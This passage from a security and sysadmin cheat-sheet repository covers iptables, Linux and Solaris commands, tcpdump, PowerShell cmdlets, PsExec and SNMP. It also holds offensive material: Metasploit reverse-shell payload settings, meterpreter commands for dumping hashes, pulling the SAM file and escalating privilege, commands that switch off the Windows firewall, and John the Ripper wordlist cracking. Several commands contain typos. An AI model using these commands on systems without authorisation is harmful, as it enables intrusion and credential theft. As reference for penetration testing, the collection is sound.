for more information. 80 | # ------------------------------------------------------------------------- 81 | IPT="/sbin/iptables" 82 | SPAMLIST="blockedip" 83 | SPAMDROPMSG="BLOCKED IP DROP" 84 | echo "Starting IPv4 Wall..." 85 | $IPT -F 86 | $IPT -X 87 | $IPT -t nat -F 88 | $IPT -t nat -X 89 | $IPT -t mangle -F 90 | $IPT -t mangle -X 91 | modprobe ip_conntrack 92 | [ -f /root/scripts/blocked.ips.txt ] && BADIPS=$(egrep -v -E "^#|^$" /root/scripts/blocked.ips.txt) 93 | PUB_IF="eth0" 94 | #unlimited 95 | $IPT -A INPUT -i lo -j ACCEPT 96 | $IPT -A OUTPUT -o lo -j ACCEPT 97 | # DROP all incomming traffic 98 | $IPT -P INPUT DROP 99 | $IPT -P OUTPUT DROP 100 | $IPT -P FORWARD DROP 101 | if [ -f /root/scripts/blocked.ips.txt ]; 102 | then 103 | # create a new iptables list 104 | $IPT -N $SPAMLIST 105 | for ipblock in $BADIPS 106 | do 107 | $IPT -A $SPAMLIST -s $ipblock -j LOG --log-prefix "$SPAMDROPMSG" 108 | $IPT -A $SPAMLIST -s $ipblock -j DROP 109 | done 110 | $IPT -I INPUT -j $SPAMLIST 111 | $IPT -I OUTPUT -j $SPAMLIST 112 | $IPT -I FORWARD -j $SPAMLIST 113 | fi 114 | # Block sync 115 | $IPT -A INPUT -i ${PUB_IF} -p tcp ! --syn -m state --state NEW -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "Drop Sync" 116 | $IPT -A INPUT -i ${PUB_IF} -p tcp ! --syn -m state --state NEW -j DROP 117 | # Block Fragments 118 | $IPT -A INPUT -i ${PUB_IF} -f -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "Fragments Packets" 119 | $IPT -A INPUT -i ${PUB_IF} -f -j DROP 120 | # Block bad stuff 121 | $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags ALL FIN,URG,PSH -j DROP 122 | $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags ALL ALL -j DROP 123 | $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags ALL NONE -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "NULL Packets" 124 | $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags ALL NONE -j DROP # NULL packets 125 | $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags SYN,RST SYN,RST -j DROP 126 | $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags SYN,FIN SYN,FIN -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "XMAS Packets" 127 | $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP #XMAS 128 | $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags FIN,ACK FIN -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "Fin Packets Scan" 129 | $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags FIN,ACK FIN -j DROP # FIN packet scans 130 | $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j DROP 131 | # Allow full outgoing connection but no incomming stuff 132 | $IPT -A INPUT -i eth0 -m state --state ESTABLISHED,RELATED -j ACCEPT 133 | $IPT -A OUTPUT -o eth0 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT 134 | # Allow ssh 135 | $IPT -A INPUT -p tcp --destination-port 22 -j ACCEPT 136 | # allow incomming ICMP ping pong stuff 137 | $IPT -A INPUT -p icmp --icmp-type 8 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT 138 | $IPT -A OUTPUT -p icmp --icmp-type 0 -m state --state ESTABLISHED,RELATED -j ACCEPT 139 | # Allow port 53 tcp/udp (DNS Server) 140 | $IPT -A INPUT -p udp --dport 53 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT 141 | $IPT -A OUTPUT -p udp --sport 53 -m state --state ESTABLISHED,RELATED -j ACCEPT 142 | $IPT -A INPUT -p tcp --destination-port 53 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT 143 | $IPT -A OUTPUT -p tcp --sport 53 -m state --state ESTABLISHED,RELATED -j ACCEPT 144 | # Open port 80 145 | $IPT -A INPUT -p tcp --destination-port 80 -j ACCEPT 146 | ##### Add your rules below ###### 147 | ##### END your rules ############ 148 | # Do not log smb/windows sharing packets - too much logging 149 | $IPT -A INPUT -p tcp -i eth0 --dport 137:139 -j REJECT 150 | $IPT -A INPUT -p udp -i eth0 --dport 137:139 -j REJECT 151 | # log everything else and drop 152 | $IPT -A INPUT -j LOG 153 | $IPT -A FORWARD -j LOG 154 | $IPT -A INPUT -j DROP 155 | exit 0 156 | [27]: 157 | [28]: 158 | [29]: 159 | [30]: 160 | [31]: 161 | [32]: 162 | [33]: -------------------------------------------------------------------------------- /Collection/Linux System Info.md: -------------------------------------------------------------------------------- 1 | # Linux system info [[34]] 2 | 3 | Most common commands used to check information and configuration details about various hardware peripherals and devices. 4 | 5 | $ lscpu # Reports information abut cpu and processing units 6 | $ lshw # List hardware 7 | $ hwinfo # Hardware information 8 | $ lspci # List PCI 9 | $ lsscsi # List scsi devices 10 | $ lsusb # List usb buses and device details 11 | $ inxi # Bash script that fetches hardware details 12 | $ lsblk # List block devices 13 | $ df # Disk space of file systems 14 | $ pydf # Python df 15 | $ fdisk # Utility to modify partitions on hard drives 16 | $ mount # Used to mount/unmount and view mounted file systems 17 | $ free # Check RAM 18 | $ dmidecode # Extracts hardware information by reading data from the SMBIOS data structures 19 | $ /proc files # Virtual files in /proc directory contain information about hardware and configurations 20 | $ hdparm # Gets information about sata devices 21 | 22 | [34]: -------------------------------------------------------------------------------- /Collection/Manipulating files.md: -------------------------------------------------------------------------------- 1 | # Manipulating files [[35]] 2 | 3 | Most frequently used Linux Commands for manipulating files. 4 | 5 | $ cp file1 file # Copies the contents of file1 into file2. If file2 does not exist, it is created 6 | $ cp -i file1 file2 # If file2 exists, the user is prompted before it is overwritten with the contents of file1 7 | $ mv file1 file2 # If file2 does not exist, then file1 is renamed file2. If file2 exists, its contents are replaced with the contents of file1 8 | $ rm file1 file2 # Deletes file1 and file2 9 | $ mkdir directory # Create directories 10 | [35]: -------------------------------------------------------------------------------- /Collection/Metasploit.md: -------------------------------------------------------------------------------- 1 | # Metasploit [[36]] 2 | 3 | ### Meterpreter Payloads 4 | 5 | set payload windows/meterpreter/reverse_tcp # Windows reverse tcp payload 6 | set payload windows/vncinject/reverse_tcp # Meterpreter Windows VNC Payload 7 | set ViewOnly false 8 | set payload linux/meterpreter/reverse_tcp # Meterpreter Linux Reverse Payload 9 | 10 | ### Meterpreter Cheat Sheet 11 | 12 | upload file c:\\windows # Meterpreter upload file to Windows target 13 | download c:\\windows\\repair\\sam /tmp # Meterpreter download file from Windows target 14 | download c:\\windows\\repair\\sam /tmp # Meterpreter download file from Windows target 15 | execute -f c:\\windows\temp\exploit.exe # Meterpreter run .exe on target - handy for executing uploaded exploits 16 | execute -f cmd -c # Creates new channel with cmd shell 17 | ps # Meterpreter show processes 18 | shell # Meterpreter get shell on the target 19 | getsystem # Meterpreter attempts priviledge escalation on the target 20 | hashdump # Meterpreter attempts to dump the hashes on the target 21 | portfwd add –l 3389 –p 3389 –r target # Meterpreter create port forward to target machine 22 | portfwd delete –l 3389 –p 3389 –r target # Meterpreter delete port forward 23 | 24 | ### Auxilary Metasploit Modules 25 | 26 | use auxiliary/scanner/http/dir_scanner # Metasploit HTTP directory scanner 27 | use auxiliary/scanner/http/jboss_vulnscan # Metasploit JBOSS vulnerability scanner 28 | use auxiliary/scanner/mssql/mssql_login # Metasploit MSSQL Credential Scanner 29 | use auxiliary/scanner/mysql/mysql_version # Metasploit MSSQL Version Scanner 30 | use auxiliary/scanner/oracle/oracle_login # Metasploit Oracle Login Module 31 | 32 | ### Metasploit Powershell Modules 33 | 34 | use exploit/multi/script/web_delivery # Metasploit powershell payload delivery module 35 | post/windows/manage/powershell/exec_powershell # Metasploit upload and run powershell script through a session 36 | use exploit/multi/http/jboss_maindeployer # Metasploit JBOSS deploy 37 | use exploit/windows/mssql/mssql_payload # Metasploit MSSQL payload 38 | 39 | [36]: -------------------------------------------------------------------------------- /Collection/Miscellaneous Commands Windows.md: -------------------------------------------------------------------------------- 1 | # Miscellaneous commands Windows[[37]] 2 | 3 | ### Lock Workstation 4 | 5 | rundll32.dll user32.dll LockWorkstation 6 | 7 | ### Disable Windows Firewall 8 | 9 | netsh advfirewall set currentprofile state off 10 | netsh advfirewall set allprofiles state off 11 | 12 | ### Native Windows Port Forward 13 | 14 | netsh interface portproxy add v4tov4 listenport=3000 15 | netsh advfirewall set allprofiles state off 16 | 17 | ### Native Windows Port Forward 18 | 19 | netsh interface portproxy add v4tov4 listenport=3000 20 | listenaddress=l.l.l.l connectport=4000 connectaddress=2.2.2.2 21 | 22 | #Remove 23 | netsh interface portproxy delete v4tov4 listenport=3000 24 | listenaddress=l.l.l.l 25 | 26 | NOTICE: Must use administrative privileges. 27 | 28 | ### Re-Enable Command prompt 29 | 30 | reg add HKCU\Software\Policies\t1icrosoft\Windows\System /v DisableCHD /tREG DWORD /d 0 /f 31 | 32 | [37]: -------------------------------------------------------------------------------- /Collection/Packet Capturing.md: -------------------------------------------------------------------------------- 1 | # Packet Capturing[[38]] 2 | 3 | tcpdump -i eth0 # Capture Packets From Specific Interface 4 | tcpdump -c 5 -i eth0 # Capture Only N Number of Packets 5 | tcpdump -A -i eth0 # Print Captured Packets in ASCII 6 | tcpdump -D # Display Available Interfaces 7 | tcpdump -XX -i eth0 # Display Captured Packets in HEX and ASCII 8 | tcpdump -w 0001.pcap -i eth0 # Capture and Save Packets in a File 9 | tcpdump -r 0001.pcap # Read Captured Packets File 10 | tcpdump -n -i eth0 # Capture IP address Packets 11 | tcpdump -i eth0 tcp # Capture only TCP Packets 12 | tcpdump -i eth0 port 22 # Capture Packet from Specific Port 13 | tcpdump -i eth0 src 192.168.0.2 # Capture Packets from source IP 14 | tcpdump -i eth0 dst 50.116.66.139 # Capture Packets from destination IP 15 | 16 | [38]: 17 | 18 | 19 | 20 | 21 | -------------------------------------------------------------------------------- /Collection/Password Cracking.md: -------------------------------------------------------------------------------- 1 | # Password Cracking [[39]] 2 | 3 | ## John The Ripper - JTR 4 | 5 | ###JTR password cracking 6 | 7 | john --wordlist=/usr/share/wordlists/rockyou.txt hashes 8 | 9 | ### JTR forced descrypt cracking with wordlist 10 | 11 | john --format=descrypt --wordlist /usr/share/wordlists/rockyou.txt hash.txt 12 | 13 | 14 | ### JTR forced descrypt cracking with wordlist 15 | 16 | john --format=descrypt hash --show 17 | 18 | [39]: -------------------------------------------------------------------------------- /Collection/Powershell.md: -------------------------------------------------------------------------------- 1 | # Powershell[[40]] 2 | 3 | # # Comment / Remark 4 | $_ # The current pipeline object 5 | $variable = "value" # Define a variable also: ${n!a#me} = "value" 6 | % # Alias for ForEach-Object 7 | --% # Stop parsing input 8 | & (call) # Run a command, script or function 9 | . (source) # Run a command script in the current shell 10 | ? # Alias for Where-Object 11 | @(...) # Force an expression to be evaluated as an array 12 | #NAME? # Format operator 13 | Active Directory # Account, Computer, Group and User cmdlets 14 | Add-Computer # Add a computer to the domain 15 | Add-Content # Add to the content of the item 16 | Add-History # Add entries to the session history 17 | Add-Member # Add a member to an instance of a PowerShell object 18 | Add-PsSnapIn # Add snap-ins to the console 19 | Add-Type # Add a .NET Framework type to a PowerShell session 20 | Add-WindowsFeature # Install roles, role services, and features 21 | Backup-GPO # Backup group policy objects (GPOs) 22 | Backup-GPO # Backup group policy objects (GPOs) 23 | Begin # Function BEGIN block 24 | BITS # Background Intelligent Transfer Service cmdlets 25 | Break # Exit a program loop 26 | Catch # Handle a terminating error within a scriptblock 27 | Checkpoint-Computer # Create a system restore point (XP) 28 | Checkpoint-Web # Create a checkpoint for an IIS web app 29 | Clear-Content # Remove content from a file/item 30 | Clear-EventLog # Delete all entries from an event log 31 | Clear-History # Delete entries from the session history 32 | Clear-Host # Clear the screen 33 | Clear-Host # Clear the screen 34 | Clear-Item # Remove content from a variable or an alias 35 | Clear-ItemProperty # Remove the property value from a property 36 | Clear-Variable # Remove the value from a variable 37 | Compare-Object # Compare the properties of objects 38 | Compare-Object # Compare the properties of objects 39 | Complete-Transaction # Commit the transaction 40 | Compress-Archive # Create a new archive/zipped file [PS 5+] 41 | Connect-WSMan # Connect to the WinRM service on a remote computer 42 | Continue # Skip just this iteration of a loop 43 | ConvertFrom-CSV # Convert object properties (in CSV format) into CSV objects 44 | ConvertFrom-SecureString # Convert a secure string into an encrypted standard string 45 | ConvertFrom-StringData # Convert a here-string into a hash table 46 | Convert-Path # Convert a ps path to a provider path 47 | ConvertTo-CSV # Convert .NET Framework objects into CSV variable 48 | ConvertTo-Html # Convert the input into an HTML table 49 | ConvertTo-SecureString # Convert an encrypted standard string into a secure string 50 | ConvertTo-Xml # Convert the input into XML 51 | Copy-Item # Copy an item from a namespace location 52 | Copy-ItemProperty # Copy a property along with it's value 53 | Debug-Process # Attach a debugger to a running process 54 | Disable-ComputerRestore # Disable System Restore on a drive 55 | Disable-PSBreakpoint # Disable a breakpoint in the current console 56 | Disable-PSRemoting # Disable remote session configuration on the local computer 57 | Disable-PSSessionConfiguration # Disable session configurations on the local computer 58 | Disable-WSMAnCredSSP # Disable Credential Security Service Provider (SSP) authentication 59 | Disconnect-WSMan # Disconnect from the WinRM service on a remote 60 | Do # Loop while a condition is True 61 | Enable-ComputerRestore # Enable System Restore on a drive 62 | Enable-PSBreakpoint # Enable a breakpoint in the current console 63 | Enable-PSRemotRemoting # Run PowerShell commands on remote computers 64 | Enable-PSSessionConfiguration # Enable session configurations on the local computer 65 | Enable-WSManCredSSP # Enable Credential SSP authentication 66 | End # Function END block 67 | Enter-PSSessio # Start an interactive session with a remote computer 68 | Exit-PSSession # Exit PowerShell (or exit a script) 69 | Exit-PSSession # End an interactive session with a remote computer 70 | Expand-Archive # Extract files from an archive (zipped) file [PS 71 | Export-Alias # Export an alias list to a file 72 | Export-Clixml # Produce a clixml representation of PowerShell ob 73 | Export-Console # Export console configuration to a file 74 | Export-Counter # Export Performance Counter data to log files 75 | Export-Csv # Export to Comma Separated Values (spreadsheet) 76 | Export-FormatData # Save formatting data from the current session 77 | Export-ModuleMember # Export specific module members 78 | Export-PSSession # Import commands and save them in a PowerShell mo 79 | For # Loop through items that match a condition 80 | ForEach # Loop through each item in a collection 81 | ForEach method # Loop through each item in a collection 82 | ForEach-Object # Reach Loop through each item in the pipeline ( % ) 83 | Format-Custom # Format output using a customized view 84 | Format-List # Format output as a list of properties, each on a 85 | Format-Table # Format output as a table 86 | Format-Wide # Format output as a table listing one property on 87 | Get-Acl # Get permission settings for a file or registry ke 88 | Get-Alias # Return alias names for Cmdlets 89 | Get-AuthenticonSignature # Get the signature object associated with a file 90 | Get-ChildItem # Get child items (contents of a folder or registry) 91 | Get-Command # Get basic information about cmdlets 92 | Get-Command # Retrieve basic information about a command 93 | Get-ComputerRestorePoint # Get the restore points on the local computer 94 | Get-Content # Get content from item (specific location) 95 | Get-Counter # Get performance counter data 96 | Get-Credential # Get a security credential (username/password) 97 | Get-Culture # Get region information (language and keyboard la 98 | Get-Date # Get current date and time 99 | Get-DscConfiguration # Get the current config. of a node 100 | Get-DscLocalConfigurationManager # Get Local Config Manager settings 101 | Get-DscResource # Get Desired State Config. resources from a compute 102 | Get-Event # Get events in the PowerShell event queue 103 | Get-Eventlog # Get event log data (2003) 104 | Get-EventSubscriber # Get event subscribers 105 | Get-ExecutionPolicy # Get the execution policy for the shell 106 | Get-FormatData # Get the formatting data in the current session 107 | Get-Help # Open the help file 108 | Get-History # Get a listing of the session history 109 | Get-Host # Get host information (PowerShell Version and Region) 110 | Get-HotFix # Get Installed hotfixes 111 | Get-Item # Get a file/registry object (or any other namespa 112 | Get-Item # Get a file object or get a registry (or other names) 113 | Get-ItemProperty # Retrieve the properties of an object 114 | Get-Job # Get PowerShell background jobs that are running 115 | Get-Location # Get and display the current location 116 | Get-Member # Enumerate the properties of an object 117 | Get-Module # Get the modules imported to the session 118 | Get-Pfxcertificate # Get pfx certificate information 119 | Get-Process # Get a list of processes on a machine 120 | Get-PSBreakpoint # Get the currently set breakpoints 121 | Get-PSDrive # Get drive information (DriveInfo) 122 | Get-PSProvider # Get information for the specified provider 123 | Get-PSSession # Get the PSSessions in the current session 124 | Get-PSSessionConfiguration # Get the registered PS session configuration 125 | Get-PsSnapin # List PowerShell snap-ins on this computer 126 | Get-Random # Get a random number 127 | Get-Service # Get a list of services 128 | Get-Tracesource # Get components that are instrumented for tracing 129 | Get-Transaction # Get information about the active transaction 130 | Get-Uiculture # Get the ui culture information 131 | Get-Unique # Get the unique items in a collection 132 | Get-Variable # Get a PowerShell variable 133 | Get-WebApplicationMonitoringStatus # Get the monitoring status of web apps 134 | Get-WindowsFeature # Retrieve roles, role services, and features 135 | Get-WinEvent # Get event log data (Vista+) 136 | Get-WmiObject # Get WMI class information 137 | Get-WSManCredSSP # Get the Credential SSP configuration 138 | Get-WSManInstance # Display management information (XML or value) 139 | Group-Object # Group objects that contain the same value 140 | if # Conditionally perform a command 141 | Import-Alias # Import an alias list from a file 142 | Import-Clixml # Import a clixml file and rebuild the PS object 143 | Import-Counter # Import performance counter log files 144 | Import-Csv # Take values from a CSV list and send objects dow 145 | Import-GPO # Import Group Policy settings into a specified GPO 146 | Import-Module # Add a module to the session 147 | Import-PSSession # Import commands from another session 148 | Invoke-Command # Run commands on local and remote computers 149 | Invoke-Command # Run command 150 | Invoke-Express # Run a PowerShell expression 151 | Invoke-History # Invoke a previously executed Cmdlet 152 | Invoke-Item # Invoke an executable or open a file (START) 153 | Invoke-WmiMethod # Call WMI methods 154 | Invoke-WSManAction # Invoke an action on a specified object 155 | Job Trigger cmdlets # Get/Set Scheduled job triggers 156 | Join-Path # Combine a path and child-path 157 | Limit-EventLog # Limit the size of the event log 158 | Measure-Command # Measure running time 159 | Measure-Object # Measure the properties of an object 160 | Move-Item # Move an item from one location to another 161 | Move-ItemProperty # Move a property from one location to another 162 | New-Alias # Create a new alias. 163 | New-DSCCheckSum # Create checksum files for DSC docs/resources 164 | New-Event # Create a new event 165 | New-Eventlog # Create a new event log and a new event source 166 | New-Item # Create a new item in a namespace 167 | New-ItemProperty # Set a new property 168 | New-Module # Create a new dynamic module (only in memory) 169 | New-Object # Create a new .Net object 170 | New-PSDrive # Create a mapped network drive 171 | New-PSSession # Create a persistent connection to a local or remote 172 | New-PSSessionOption # Advanced options for a PSSession 173 | New-Service # Create a new service 174 | New-Timespan # Create a timespan object 175 | New-Variable # Create a new variable 176 | New-WebServiceProxy # Create a Web service proxy object 177 | New-WSManInstance # Create a new instance of a management resource 178 | New-WSManSessionOption # Options for WSMan commands 179 | Out-Default # Send output to default 180 | Out-File # Send output to a file 181 | Out-GridView # Send output to an interactive table 182 | Out-Host # Send output to the host 183 | Out-Null # Send output to null 184 | Out-Printer # Send the output to a printer 185 | Out-String # Send objects to the host as strings 186 | Param # Script Parameters 187 | Pause # Pause and display the message "Press Enter to continue" 188 | Pop-Location # Set the current working location from the stack 189 | Pop-Location # Set the current working location from the stack 190 | Powershell # Launch a PowerShell session 191 | Process # Function PROCESS block 192 | Push-Location # Push a location to the stack 193 | Push-Location # Push a location to the stack 194 | Quest AD # Read and write to Active Directory 195 | Read-Host # Read a line of input from the host console 196 | Read-Host # Read a line of input from the host console 197 | Receive-Job # Get PowerShell background job results 198 | Register-EngineEvent # Subscribe to PowerShell events 199 | Register-ObjectEvent # Subscribe to .NET events 200 | Register-PSSessionConfiguration # Create and register a new PS session confi 201 | Register-WmiEvent # Subscribe to a WMI event 202 | Remove-Computer # Remove the local computer from a workgroup or doma 203 | Remove-Event # Delete events from the event queue 204 | Remove-EventLog # Delete an event log 205 | Remove-Item D # se/rd/rm/rmdir Delete an item 206 | Remove-Item r # erase/rd/ri/rmdir Remove an item 207 | Remove-Item r # erase/rd/ri/rmdir Remove an item 208 | Remove-ItemProperty # Remove a property and its value 209 | Remove-Job # Delete a PowerShell background job 210 | Remove-Module # Remove a module from the current session 211 | Remove-PSBreakpoint # Delete breakpoints from the current console 212 | Remove-PSDrive # Remove a provider/drive from its location 213 | Remove-PSSession # Close PowerShell sessions 214 | Remove-PSSnapin # Remove PowerShell snap-ins from the console 215 | Remove-Variable # Remove a variable and its value 216 | Remove-Windows # Remove roles, role services, and features 217 | Remove-WmiObject # Delete an instance of a WMI class 218 | Remove-WSManInstance # Delete a management resource instance 219 | Rename-Item # Change the name of an existing item 220 | Rename-ItemProperty # Rename a property of an item 221 | Rename-ItemProperty # Renames a property at its location 222 | Reset-Computer # Password Reset the machine account password for the computer 223 | Resolve-Path # Resolves the wildcards in a path 224 | Restart-Computer # Restart the operating system on a computer 225 | Restart-Service # Stop and then restart a service 226 | Restore-Computer # Restore the computer to a previous state 227 | Restore-GPO # Restore one or all GPOs from a GPO backup 228 | Resume-Service # Resume a suspended service 229 | Return # Exit the current scope, (function, script, or script block) 230 | Run/Call # Run a command (call operator) 231 | Scheduler # Get/Set scheduled jobs 232 | Select-Object # Select properties of objects 233 | Select-Object # Select properties of objects 234 | Select-String # Search through strings or files for patterns 235 | Select-XML # Find text in an XML string or document 236 | Send-MailMessage # Send an email message 237 | Send-MailMessage # Send an email message 238 | Set-Acl # Set permissions 239 | Set-Alias # Create or change an alias 240 | Set-AuthenticodeSignature # Place a signature in a .ps1 script or other file 241 | Set-Content # Set content in the item (specific location) 242 | Set-Date # Set system time on the host system 243 | Set-ExecutionPolicy # Change the execution policy (user preference) 244 | Set-Item # Change the value of an item 245 | Set-ItemProperty # Set a property at the specified location to a specified value 246 | Set-Location # Set the current working location 247 | Set-Location # Set the current working location 248 | Set-PSBreakpoint # Set a breakpoint on a line, command, or variable 249 | Set-PSdebug # Turn script debugging on or off 250 | Set-PSSessionConfiguration # Change properties of a registered session config 251 | Set-Service # Change the start mode/properties of a service 252 | Set-StrictMode # Enforce coding rules in expressions & scripts 253 | Set-Tracesource # Trace a PowerShell component 254 | Set-Variable # Set a variable and a value 255 | Set-WmiInstance # Create or update an instance of an existing WMI class 256 | Set-WSManInstance # Modify the management information related to a resource 257 | Set-WSManQuickConfig # Configure the local computer for remote management 258 | Show-EventLog # Display an event log 259 | Sort-Object # Sort objects by property value 260 | Sort-Object # Sort objects by property value 261 | Split-Path # Return part of a path 262 | Start-DscConfiguration # Apply Desired State config to nodes 263 | Start-Job # Start a PowerShell background job 264 | Start-Process # Start one or more processes 265 | Start-Service # Start a stopped service 266 | Start-Sleep # Suspend shell, script, or runspace activity 267 | Start-Transaction # Start a new transaction 268 | Start-Transcript # Start a transcript of a command shell session 269 | Stop-Computer # Stop (shut down) a computer 270 | Stop-Job # Stop a PowerShell background job 271 | Stop-Process # Stop a running process 272 | Stop-Process # Stop a running process 273 | Stop-Service # Stop a running service 274 | Stop-Transcript # Stop the transcription process 275 | Suspend-Service # Suspend a running service 276 | Switch # Multiple if statements 277 | Tee-Object # Send input objects to two places 278 | Test-ComputerSecureChannel # Test and repair the secure channel to the domain 279 | Test-Connection # Ping one or more computers 280 | Test-Path # Return true if the path exists, otherwise return false 281 | Test-WSMan # Test if a computer is setup to receive remote command 282 | Trace-Command # Trace an expression or command 283 | Trap # Handle a terminating error 284 | Try ... Catch # Handle a terminating error within a scriptblock 285 | Unblock-File # Unblock files downloaded from the Internet 286 | Undo-Transaction # Roll back a transaction 287 | Unregister-Event # Cancel an event subscription 288 | Unregister-PSSessionConfiguration # Configuration Delete registered PS session configuration 289 | Update-Formatdata # Update and append format data files 290 | Update-Help # Download and install help files 291 | Update-List # Add and remove items from a collection 292 | Update-TypeData # Update extended type configuration 293 | Update-Typedata # Update the current extended type configuration 294 | Use-Transaction # Add a command or expression to the transaction 295 | Wait-Event # Wait until a particular event is raised 296 | Wait-Job # Wait for a background job 297 | Wait-Process # Wait for a process to stop 298 | Where method # Filter objects from a collection 299 | Where-Object # Filter the objects passed along the command pipeline 300 | Where-Object # Filter input from the pipeline 301 | While # Loop while a condition is True 302 | Write-Debug # Write a debug message to the host display 303 | Write-Error # Write an object to the error pipeline 304 | Write-EventLog # Write an event to an event log 305 | Write-Host # Display text on screen 306 | Write-Host # Write customized output to the host/screen 307 | Write-Output # Write an object to the pipeline 308 | Write-Progress # Display a progress bar 309 | Write-Verbose # Write a string to the host's verbose display 310 | Write-Warning # Write a string in reverse video to the display 311 | Zipfile # Compress or Extract zip files 312 | 313 | [40]: 314 | -------------------------------------------------------------------------------- /Collection/PsExec.md: -------------------------------------------------------------------------------- 1 | # PsExec[[41]] 2 | PsExec is a light-weight telnet-replacement that lets you execute processes on other systems, complete with full interactivity for console applications, without having to manually install client software. 3 | 4 | # The following command launches an interactive command prompt on \\marklap: 5 | 6 | psexec \\marklap cmd 7 | 8 | # This command executes IpConfig on the remote system with the /all switch, and displays the resulting output locally 9 | 10 | psexec \\marklap ipconfig /all 11 | 12 | # This command copies the program test.exe to the remote system and executes it interactively 13 | 14 | psexec \\marklap -c test.exe 15 | 16 | # Specify the full path to a program that is already installed on a remote system if its not on the system's path 17 | 18 | psexec \\marklap c:\bin\test.exe 19 | 20 | # Run Regedit interactively in the System account to view the contents of the SAM and SECURITY keys 21 | 22 | psexec -i -d -s c:\windows\regedit.exe 23 | 24 | # To run Internet Explorer as with limited-user privileges use this command 25 | 26 | psexec -l -d "c:\program files\internet explorer\iexplore.exe" 27 | 28 | [41]: -------------------------------------------------------------------------------- /Collection/Running Remote Commands.md: -------------------------------------------------------------------------------- 1 | # Running remote commands[[42]] 2 | Many Windows PowerShell cmdlets have the ComputerName parameter that enables you to collect data and change settings on one or more remote computers. They use a variety of communication technologies and many work on all Windows operating systems that Windows PowerShell supports without any special configuration. 3 | 4 | Typically, cmdlets that support remoting without special configuration have the ComputerName parameter and do not have the Session parameter. To find these cmdlets in your session, type: 5 | 6 | Get-Command | where { $_.parameters.keys -contains "ComputerName" -and $_.parameters.keys -notcontains "Session"} 7 | 8 | ### Start an Interactive Session 9 | 10 | To start an interactive session with a single remote computer, we use the Enter-PSSession cmdlet. 11 | 12 | Enter-PSSession Server01 13 | 14 | ### Exit Session 15 | 16 | Exit-PSSession 17 | 18 | ### Running a remote command 19 | 20 | To run any command on one or many remote computers, use the Invoke-Command cmdlet. For example, to run a Get-UICulture command on the Server01 and Server02 remote computers, type: 21 | 22 | Invoke-Command -ComputerName Server01, Server02 {Get-UICulture} 23 | 24 | ### Output example 25 | 26 | ![Untitled.png](https://www.dropbox.com/s/k545zhqu94vn33c/Untitled.png?dl=0&raw=1) 27 | 28 | ### Run a script 29 | 30 | Invoke-Command -ComputerName Server01, Server02 -FilePath c:\Scripts\DiskCollect.ps1 31 | 32 | ### Establish a Persistent Connection 33 | Following command creates a remote session on the Server01 computer and another remote session on the Server02 computer. It saves the session objects in the $s variable. 34 | 35 | $s = New-PSSession -ComputerName Server01, Server02 36 | 37 | following command creates a remote session on the Server01 computer and another remote session on the Server02 computer. It saves the session objects in the $s variable. 38 | 39 | Invoke-Command -Session $s {$h = Get-HotFix} 40 | 41 | Now you can use the data in the $h variable in subsequent commands, such as the following one. The results are displayed on the local computer. 42 | 43 | Invoke-Command -Session $s {$h | where {$_.installedby -ne "NTAUTHORITY\SYSTEM"}} 44 | 45 | [42]: 46 | 47 | -------------------------------------------------------------------------------- /Collection/SNMP.md: -------------------------------------------------------------------------------- 1 | # SNMP 2 | 3 | ### Concept [[43]] 4 | 5 | ![snmp.png](https://www.dropbox.com/s/srwfkxgbqyep6yo/snmp.png?dl=0&raw=1) 6 | 7 | ### Command Examples [[44]] 8 | This command returns an administratively assigned name for this managed node. 9 | 10 | % snmpget -mALL -v1 -cpublic snmp_agent_Ip_address sysName.0 11 | The snmpwalk command performs a sequence of chained GETNEXT requests automatically. It is a work saving command. 12 | 13 | % snmpwalk -mALL -v1 -cpublic snmp_agent_Ip_address system 14 | 15 | The snmpbulkwalk command uses the GETBULK SNMP protocol feature to query for an entire tree of information about a network entity 16 | 17 | % snmpbulkwalk -mALL -v2c -cprivate snmp_agent_Ip_address entPhysicalTable>time7 18 | 19 | 20 | 21 | [43]: 22 | [44]: 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /Collection/Solaris.md: -------------------------------------------------------------------------------- 1 | # Solaris [[45]] 2 | 3 | ifconfig -a # List of interfaces 4 | netstat -in # List of interface 5 | ifconfig -r # Route listing 6 | ifconfig ethO dhcp # Start DHCP client 7 | ifconfig ethO plumb up ip netmask nmask # SET IP 8 | route add default ip # Set gateway 9 | logins -p # List users w/out passwords 10 | svcs -a # List all services w/ status 11 | prstat -a # Process listing (top) 12 | svcadm start ssh # Start SSH service 13 | inetadm -e telnet (-d for disable) # Enable telnet 14 | prtconf I grep Memory # Total physical memory 15 | iostat -En # Hard disk size 16 | showrev -c /usr/bin/bash # Information on a binary 17 | shutdown -i6 -gO -y # Restart system 18 | dfmounts # List clients connected NFS 19 | smc 20 | snoop -d int -c pkt # -o results.pcap # Packet capture 21 | /etc/vfstab # File system mount table 22 | /var/adm/logging # Login attempt log 23 | /etc/default/' # Default settings 24 | /etc/system # Kernel modules & config 25 | /var/adm/messages # Syslog location 26 | /etc/auto_' # Automounter config files 27 | /etc/inet/ipnodes # IPv4/IPv6 host file 28 | 29 | [45]: 30 | 31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /Collection/Startup Directories.md: -------------------------------------------------------------------------------- 1 | # Startup Directories [[46]] 2 | 3 | ### NT 6.1 4 | 5 | Personal Startup folder: 6 | 7 | 